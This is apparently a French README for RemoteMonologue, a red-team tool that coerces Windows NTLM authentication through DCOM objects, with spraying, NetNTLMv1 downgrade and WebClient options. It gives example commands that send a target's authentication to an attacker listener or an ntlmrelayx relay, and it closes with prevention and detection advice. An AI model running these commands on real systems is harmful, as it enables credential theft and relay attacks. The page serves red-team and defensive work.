
Armer DCOM pour les coercitions d'authentification NTLM
RemoteMonologue est une technique de collecte d'identifiants Windows qui permet de compromettre des utilisateurs à distance en exploitant la clé RunAs de l'utilisateur interactif et en forçant des authentifications NTLM via DCOM.
Lisez l'article de X-Force Red RemoteMonologue : Armer DCOM pour les coercitions d'authentification NTLM pour plus de détails.
🔹 Coercition d'authentification via DCOM (-dcom)
ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession) pour déclencher une authentification NTLM contre un écouteur spécifié (-auth-to).🔹 Pulvérisation d'identifiants (-spray)
🔹 Attaque par rétrogradation NetNTLMv1 (-downgrade)
🔹 Abus du service WebClient (-webclient)
🔹 Énumération des utilisateurs (-query)
Remarque : Des privilèges d'administrateur local sur le système cible sont requis.
pip install impacket
Voici un exemple d'exécution de RemoteMonologue avec l'attaque par rétrogradation NetNTLMv1 tout en utilisant Responder comme écouteur. Par défaut, si aucune option DCOM n'est spécifiée, l'outil utilise l'objet DCOM ServerDataCollectorSet.
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

Voici un autre exemple : cette fois, l'attaque est exécutée à l'aide de l'objet DCOM FileSystemImage et de l'activation du service WebClient pour obtenir une authentification HTTP, qui est ensuite relayée vers LDAP à l'aide de ntlmrelayx.
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

Pour se protéger contre ces techniques et les détecter, plusieurs mesures de prévention et de détection peuvent être mises en œuvre.
Mesures de prévention :
Activer la signature LDAP et la liaison de canal : Configurez l'application de la signature LDAP et la liaison de canal sur les contrôleurs de domaine afin de protéger le point de terminaison LDAP contre les attaques par relais. Remarque : Ces paramètres seront appliqués par défaut à partir de Windows Server 2025.
Passer aux dernières versions de Windows : Mettez à niveau les serveurs vers Windows Server 2025 et les postes de travail vers Windows 11 version 24H2 afin d'atténuer les attaques par rétrogradation NetNTLM, car NTLMv1 a été supprimé dans ces versions.
Appliquer la signature SMB : Activez et appliquez la signature SMB sur les serveurs Windows pour empêcher les attaques par relais SMB.
Mettre en œuvre des politiques de mots de passe forts : Imposez des exigences de mots de passe robustes afin de rendre les attaques par cassage de mots de passe plus difficiles.
Opportunités de détection :
Surveiller l'accès distant aux objets DCOM : Suivez l'accès aux objets DCOM concernés ainsi qu'à leurs propriétés et méthodes spécifiques afin d'identifier toute activité inhabituelle.
Surveiller les modifications du registre : Surveillez les modifications des clés de registre RunAs et LmCompatibilityLevel.
Suivre l'activité du service WebClient : Surveillez les cas où le service WebClient est activé à distance, car il est utilisé pour faciliter les authentifications NTLM basées sur HTTP.